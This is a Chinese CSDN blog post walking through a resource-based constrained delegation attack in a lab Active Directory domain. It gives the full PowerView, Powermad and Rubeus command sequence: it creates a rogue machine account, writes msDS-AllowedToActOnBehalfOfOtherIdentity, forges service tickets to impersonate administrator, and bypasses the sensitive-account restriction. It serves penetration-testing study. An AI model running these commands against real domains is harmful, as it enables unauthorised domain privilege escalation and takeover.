域渗透——基于资源的约束委派利用

最新推荐文章于 2024-06-02 15:21:42 发布
最新推荐文章于 2024-06-02 15:21:42 发布
阅读量1.8k 收藏 4
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/107096250
版权

环境

域: test.com
域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7
委派的域内主机:系统:win2008R2,主机名:win2008,ip:192.168.1.24
域内普通用户: test,对win2008有写的权限
域内普通用户: test1
攻击机器:系统:win2019 ip:192.168.1.19 登录用户为test1


设置test的写权限

在这里插入图片描述
验证test这个用户对win2008是否具有写权限,可以使用PowerView枚举win2008.test.com的中的特定ACE

Get-DomainUser -Identity test -Properties objectsid         # 查询test的SID
Get-DomainObjectAcl -Identity WIN2008  | ?{$_.SecurityIdentifier -match "S-1-5-21-3298638106-3321833000-1571791979-1106"}	 # 查看是否有写权限

在这里插入图片描述
可以看到test这个用户对win2008这个计算机账户拥有完全控制权限(GenericAll),其实也不一定需要GenericAll权限,GenericWriteWritePropertyWriteDacl等等权限都是可以修改账户属性的。



创建机器用户

我们现在还需要的是一个具有SPN的账户,因为S4U2Self只适用于具有SPN的账户,恰好的是在域中有一个属性MachineAccountQuota,这个值表示的是允许用户在域中创建的计算机帐户数,默认为10,这意味着我们如果拥有一个普通的域用户那么我们就可以利用这个用户最多可以创建十个新的计算机帐户,而计算机账户默认是注册RestrictedKrbHost/domainHOST/domain这两个SPN的,所以这里刚好符合我们的意图。

我们可以使用Kevin RobertsonPowermad中的New-MachineAccount来创建一个用户名为evilsystem,密码为evil的计算机账户

Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount evilsystem -Password $(ConvertTo-SecureString "evil" -AsPlainText -Force)

查询机器用户是否创建成功

net group "domain computers" /domain

在这里插入图片描述



配置evilsystem到win2008的基于资源约束的委派

下面是修改win2008的msDS-AllowedToActOnBehalfOfOtherIdentity属性的值,有两种方法可以修改,Powerview或者ActiveDirectory模块

这儿以powershell举例

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3298638106-3321833000-1571791979-1112)"  #这儿的sid是我们创建的机器用户evilsystem的sid
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer WIN2008| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

获取evilsystem的SID

Get-NetComputer "evilsystem"

验证是否成功添加

Get-DomainComputer win2008 -Properties msds-allowedtoactonbehalfofotheridentity

在这里插入图片描述这样就表示成功了~~

若想清除msds-allowedtoactonbehalfofotheridentity属性的值,可用如下命令:

Set-DomainObject win2008 -Clear 'msds-allowedtoactonbehalfofotheridentity' -Verbose

配置完msDS-AllowedToActOnBehalfOfOtherIdentity属性之后就可以通过基于资源的约束委派去攻击目标主机了



攻击过程

这儿我们使用Rubeus来进行请求白银票据

因为Rubeus是不支持明文的,所以先把它转换为hash
在这里插入图片描述
然后用evilsystem$的hash请求白银票据并导入到当前会话中

Rubeus.exe s4u /user:evilsystem$ /rc4:B1739F7FC8377E25C77CFA2DFBDC3EC7 /impersonateuser:administrator /msdsspn:cifs/WIN2008 /ptt
Rubeus.exe s4u /user:evilsystem$ /rc4:B1739F7FC8377E25C77CFA2DFBDC3EC7 /impersonateuser:administrator /msdsspn:host/WIN2008 /ptt

这儿需要导入两个票据才能用wmiexec连接win2008,我参考的文章作者使用的是psexecimpacketgetst.exe,但是我并没有成功,我是用wmiexec是可以连接上的(但是需要以管理员权限打开,本地管理员也可以)

下面是两个工具的使用命令(我自己使用这个没有成功)

PsExec64.exe \\win2008 cmd
getst.exe -dc-ip 192.168.1.24 -spn cifs/win2008 -impersonate Administrator test.com/test:evilsystem:evil

最后我是用wmiexec连接上win2008cmd的。

在这里插入图片描述
这儿我还不清楚是咋回事(太菜了~~)
(环境有点问题啊~,服了)



解决敏感用户不可委派的问题

这时候我们在通过s4u去申请一下票据,这个时候S4U2self是成功的,但是S4U2proxy是失败的

这个时候,将S4U2proxybase64提取成test.kirbi,然后再用Rubeus修改就可以了

Rubeus.exe tgssub /ticket:test.kirbi /altservice:cifs/win2008 /ptt
Rubeus.exe tgssub /ticket:test.kirbi /altservice:host/win2008 /ptt


参考链接

链接

HyyMbb
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网 —— 跨攻击
战神/calmness的博客
12-09 809
目录 跨攻击的方法 利用信任关系的跨攻击 信任关系 获取信息 利用信任密钥获取目标的权限 利用krbtgt 散列值获取目标的权限 外部信任和林信任 利用约束委派 和 MS-RPRN 获取信任林权限 防范跨攻击 跨攻击的方法 都有自己的内网,一般通过林进行共享资源。根据不同职能区分 利用信任关系的跨攻击 信任关系 获取信息 利用信任密钥获取目标的权限 ...
SharpAllowedToAct:通过基于资源约束委派(msDS-AllowedToActOnBehalfOfOtherIdentity)进行计算机对象接管
05-24
夏普允许行动 描述 基于通过基于资源约束委派(MSDS-AllowedToActOnBehalfOfOtherIdentity)C#实现的计算机对象接管的由 。 积分也他的,并作为我的代码依赖于他的工具。 编译指令 确保成功安装了必要的NuGet软件包,并仅构建项目。
滥用基于资源约束委派来攻击Active Directory
weixin_30530523的博客
03-15 466
0x00 前言 早在2018年3月前,我就开始了一场毫无意义的争论,以证明TrustedToAuthForDelegation属性是无意义的,并且可以在没有该属性的情况下实现“协议转换”。我相信,只要一旦启用约束委派(msDS-AllowedToDelegateTo不为空),它是否配置为使用“仅Kerberos”或“任何身份验证协议”并起作用。 我在Benjamin Delpy(@genti...
基于资源约束委派
mingyqf的博客
02-23 838
参考:https://blog.csdn.net/nicai321/article/details/122679357 原理: 基于资源约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。 漏洞复现: 资
内攻击--->基于资源约束委派(RBCD)
最新发布
huohaowen的博客
06-02 828
基于资源约束委派RBCD他来啦~~~!!!
基于资源约束委派(RBCD)学习
whojoe的博客
07-21 3125
基于资源约束委派(RBCD)学习原理环境搭建利用添加机器账户中继&委派无另一台机器权限有另一台机器权限参考文章 原理 环境搭建 主机 机器名 ip 用户 密码 版本 控 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 内机器 user2.test.com 192.168.164.150
约束委派攻击
blue_fantasy的博客
01-20 3106
Text. 0x00 原理 用户想访问服务A,于是向KDC提交认证,KDC发现A是非约束委派,于是会把TGT放在ST中一并给用户。然后用户用这个ST去访问服务A,服务A就相当于获得了用户的TGT,把TGT放入lsass进程,然后就可以拿着用户的TGT以用户的身份去访问所有用户权限能够访问的服务了。 0x01 非约束委派的启用 找到Active Directory用户和计算机->Computers。给内机器WIN7配置约束委派 右键属性->委派->信任此计算机来委派任何服
Kerberos 委派攻击原理之 S4U2 利用详解
HBohan的博客
07-20 1339
Kerberos 委派攻击原理之 S4U2 利用详解 为了更好地防止约束委派的滥用,请查看"从 Kekeo 到 Rubeus"文章中的"s4u"部分。 几周前,我和同事李 · 克里斯滕森(在他的帮助下我完成了这篇文章和相关材料)花了一些时间深入研究了活动目录的 S4U2Self 和 S4U2Proxy 协议扩展。 就在最近,本杰明 · 德尔皮 和 Ben Campbell在推特上就同一话题进行了一次有趣的公开对话。 对话的结果是本杰明发布了一个修改过的 Kekeo,使得滥用 S4U 错误配置更为容易。 在我
内网渗透1
m0_55772907的博客
05-08 1481
一、信息收集 环境? or 工作组环境? 当我们通过 Web 漏洞或者其他的⼿段获取到了⼀个命令执⾏的⼝⼦后,我们想要对当前服务器进⾏深层次的内⽹ 渗透,那么必须得知道当前机器所在的环境是工作组 还是 ,因为两种环境的攻击⼿法不同,所以我们需要根据 不同的环境来做不同的处理! 判断是否在内 1、查看当前网卡和IP信息: ipconfig /all 2、查看系统详细信息: systeminfo 3、查看当前登录用户 net config workstation 4、
Ichunqiu云境 —— Tsclient Writeup
WUfagg的博客
12-12 782
MSSQL,Privilege Escalation,Kerberos,渗透,RDP
rbcd-attack:使用Impacket从外部进行基于Kerberos资源约束委派攻击
04-01
滥用基于Kerberos资源约束委派 TL; DR 此存储库是针对Windows Active Directory中针对Kerberos资源约束委派的实际攻击。 与其他常见实施方式的不同之处在于,我们是从Windows Domain外部发起攻击的,而不是从加入的计算机(通常是Windows)发起的攻击。 仅使用Python3 (及其依赖项)实施攻击。 在上测试了最新的Impacket(撰写本文时为0.9.21)。 攻击 总而言之,攻击没有针对任何深度细节,而是针对计算机,正是与目标计算机相关的服务主体。 我们在这里需要具备的先决条件: 具有对目标计算机的写访问权的帐户(对目标计算机对象的msDS-AllowedToActOnBehalfOfOtherIdentity属性的完全写访问权) 创建新计算机帐户的权限(通常是默认设置,请参见MachineAccount
基于资源约束委派攻击
内心不种满鲜花就会长满杂草
04-13 2148
首先,在传统的约束委派中,情况是这样的:有一个服务账户(比如一个Web服务器),它被配置为可以代表某个用户(比如一个用户)去访问另一个服务(比如数据库)。这就像是你给了你的秘书(服务账户)一张你的身份证(用户的凭证),让她去帮你办点事(访问数据库)。
渗透之基于资源约束委派
qq_56426046的博客
11-15 484
REDTEAM\hack -> WriteProperty(将机器加入的账号,也就是mS-DS-CreatorSID属性中的账户) NT AUTHORITY\SELF -> WriteProperty(机器账户自身也可以修改) 我们再回顾一个知识点,默认控的ms-DS-MachineAccountQuota属性设置允许所有用户向一个添加 多达10个计算机帐户,就是说只要有一个凭据就可以在内任意添加机器账户。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定 谁可以被委派来控制我。
内网渗透--环境下基于资源约束委派利用
sangfor_edu的博客
07-21 420
内用户都有一个属性叫做ms-ds-MachineAccountQuota,它代表的是允许用户在中常见计算机账户的个数,默认是10。那么这就代表我们如果拥有一个普通的用户那么我们就可以利用这个用户最多可以创建十个新的计算机帐户也就是机器账户。...
Kerberos 委派攻击之基于资源约束委派
Adminxe的博客
03-06 654
CSDN自动迁移博客文章注意区别:约束委派 不能跨进行委派,基于资源约束委派可以跨和林如果约束委派,必须拥有权限,该特权是敏感的,通常仅授予管理员。为了使用户/资源更加独立,Windows Server 2012 中引入了基于资源约束委派。基于资源约束委派不需要管理员权限去设置,而是把设置属性的权限赋予给了机器自身。基于资源约束委派允许资源配置受信任的帐户委派给他们。基于资源约束委派只能在运行 ·Windows Server 2012 及以上的控制器·上配置
基于windows委派的攻击思路(下)-基于资源约束委派
热门推荐
Shanfenglan's blog
12-16 4万+
文章目录1. 前言2. 技术点2.1 利用原理:那么如何获得一个机器账户呢?如何获得一个有权利修改msDS-AllowedToActOnBehalfOfOtherIdentity?3. 利用过程:1. 利用powermad添加机器账户:2. 查询添加的机器账户的sid3. 修改msDS-AllowedToActOnBehalfOfOtherIdentity:3.1 win server 2012以上:3.2 win server 2012以下:4. 利用rubues获取票据5.利用impacket 1. 前
渗透委派攻击之基于资源约束委派
Longwaer
01-25 1300
学习委派攻击,了解掌握基于资源约束委派原理及利用方式。
权限维持】-基于资源约束委派(RBCD)
qq_41617902的博客
01-20 874
基于资源约束委派(RBCD)
Windows委派攻击详解:非约束委派的威胁
文章着重介绍了非约束委派攻击的步骤,包括如何设置非约束委派利用管理员访问服务以及通过工具如mimikatz导出和注入票据。此外,还提供了使用Adfind和PowerView工具来查找内非约束委派的主机和服务账户的方法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值